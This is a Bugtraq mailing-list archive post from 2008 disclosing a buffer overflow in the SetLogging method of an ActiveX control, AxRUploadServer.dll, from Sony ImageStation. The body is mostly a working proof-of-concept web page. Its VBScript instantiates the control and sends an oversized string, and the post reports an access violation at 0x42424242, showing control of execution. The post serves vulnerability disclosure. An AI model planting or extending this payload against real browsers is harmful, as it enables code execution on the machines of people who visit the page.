Bugtraq mailing list archives

Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging)

From: david130490 () hotmail com
Date: 8 Feb 2008 16:53:59 -0000

Buffer Overflow in AxRUploadServer.dll, this file belongs to ImageStation that is a servicemark of Sony Electronics Inc.

--------------
Access Violation at 0x42424242

The code:

<object classid='clsid:E9A7F56F-C40F-4928-8C6F-7A72F2A25222' id='bof'></object>
<input language=VBScript onclick=Son() type=button value="Explotar">

<script language='vbscript'>
 Sub Son
        arg1=String(5922, "A")
        arg2=String(5, "B")

        bof.SetLogging arg1 + arg2
 End Sub
</script>

Current thread:

Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging) david130490 (Feb 08)
- <Possible follow-ups>
- Re: Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging) david130490 (Feb 08)